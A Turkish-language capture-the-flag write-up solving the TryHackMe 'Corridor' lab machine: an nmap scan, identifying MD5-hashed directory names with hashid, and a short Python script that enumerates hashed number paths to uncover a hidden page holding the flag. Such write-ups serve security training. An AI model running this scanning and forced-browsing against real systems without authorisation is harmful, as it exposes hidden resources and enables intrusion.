Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Corridor” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.251.47
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-06 22:39 +03
Nmap scan report for 10.10.251.47
Host is up (0.064s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 2.0.3 (Python 3.10.2)2 — HTTP servisine gittiğim zaman boş bir koridor fotoğrafı ile karşılaşıyorum. Sayfa kaynağını görüntülediğim zaman “hash” halinde dizin linkleri görüyorum. Herhangi birine gittiğim zaman “empty_room.jpg” fotoğrafı ile karşılaşıyorum. Tek tek linkleri denemek yerine bir python kodu yazarak istek atmayı düşünüyorum. Öncelikle “hash” in hangi algoritmaya ait olduğunu buluyorum. “Hashid” aracı ile hash’i arattığım zaman bunun bir MD5 hashi olduğunu görüyorum.
[root:/home/alper/Desktop/TRYHACKME]# hashid c4ca4238a0b923820dcc509a6f75849b
Analyzing 'c4ca4238a0b923820dcc509a6f75849b'
[+] MD2
[+] MD53 — MD5 hash’ini çözdüğüm zaman bunun bir sayıya karşılık geldiğini görüyorum. Yani dizinlerimiz bir sayının md5 hashi şeklinde. Aktif olan dizinleri bulmak için aşağıdaki python kodunu çalıştırıyorum.
import hashlib
import requests
for i in range(0,100):
hash = hashlib.md5(str(i).encode()).hexdigest()
url = "http://10.10.251.47/" + hash
res = requests.get(url)
if res.status_code != 404:
print(f"{i} - {hash} - {url}")4 — Gelen sonuçları kontrol ettiğim zaman bayrak resim olarak karşıma çıkıyor.
